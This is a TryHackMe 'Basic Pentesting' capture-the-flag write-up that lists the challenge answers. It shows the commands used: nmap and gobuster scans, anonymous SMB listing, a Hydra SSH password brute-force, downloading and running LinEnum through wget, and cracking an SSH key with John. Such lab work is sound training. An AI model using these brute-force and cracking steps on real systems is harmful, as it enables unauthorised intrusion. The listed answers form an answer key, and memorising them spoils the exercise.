Challenges: Basic Pentesting (TryHackMe)

This article will cover the Basic Pentesting write-up on THM Challenges.

Web App Testing and Privilege Escalation

In these set of tasks you'll learn the following:

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

Credits to Josiah Pierce from Vulnhub.

Answer the questions below

Deploy the machine and connect to our network
Find the services exposed by the machine
What is the name of the hidden directory on the web server(enter name without /)? development

nmap -sV -p 1-65000 <IP_Address>

gobuster dir -u <IP_Address> -w /usr/share/wordlists/dirb/common.txt

User brute-forcing to find the username & password
What is the username? jan
smbclient -L \\\\<IP_Address>\\ -N

smbclient -L \\\\10.10.11.217\\Anonymous -N this launches the smb client

smb: \> ls
// we’ll access the staff.txt file

smb: \> exit

cat staff.txt //We’ll find two users
What is the password? armando

There are a lot of Hydra commands, but the one that worked for this case was the one that uses SSH

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.143.82
What service do you use to access the server(answer in abbreviation in all caps)? SSH
Enumerate the machine to find any vectors for privilege escalation

On one tab, start the server at port 8000: python3 -m http.server 8000

on another run the following commands:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

wget http://10.10.144.83:8000/LinEnum.sh

chmod +x LinEnum.sh

./LinEnum.sh
What is the name of the other user you found(all lowercase)? kay
If you have found another user, what can you do with this information?

For this last part, you’ll be using John and SSH2John.py to find the id_rsa and later on the password
What is the final password you obtain? heresareallystrongpasswordthatfollowsthepasswordpolicy$$